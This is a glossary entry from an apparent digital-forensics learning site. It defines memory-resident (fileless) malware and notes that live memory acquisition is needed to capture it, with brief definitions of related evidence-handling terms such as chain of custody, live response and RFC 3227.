Skip to content
Log in

Memory-resident malware

Definition

Malicious code that executes entirely in RAM and writes no files to disk. Fileless malware, PowerShell-based loaders, and certain rootkits fall into this category. A shutdown destroys the only copy; live memory acquisition is the sole means of capturing it.

Related terms

Chain of custody
The documented chronological record of who collected, handled, transferred, and examined a piece of evidence. For digital evidence, chain of custody includes...
Live response
The process of collecting evidence and triage data from a running system without first powering it down. Preserves volatile artefacts that would...
Non-volatile data
Data that persists without power, such as files on a hard disk, SSD, or optical media, and data in non-volatile memory chips....
RFC 3227
Guidelines for Evidence Collection and Archiving, published by the IETF in February 2002. It defines the order of volatility, the documentation requirements...
Volatile data
Any digital information that is lost when power is removed or the system state changes. Examples include RAM contents, CPU register values,...

Explained in

Your journey to becoming a forensic professional starts here.

Practice with mock tests, learn from structured notes, and get your questions answered by a global forensic community, all in one place.

Continue learningCreate Your Account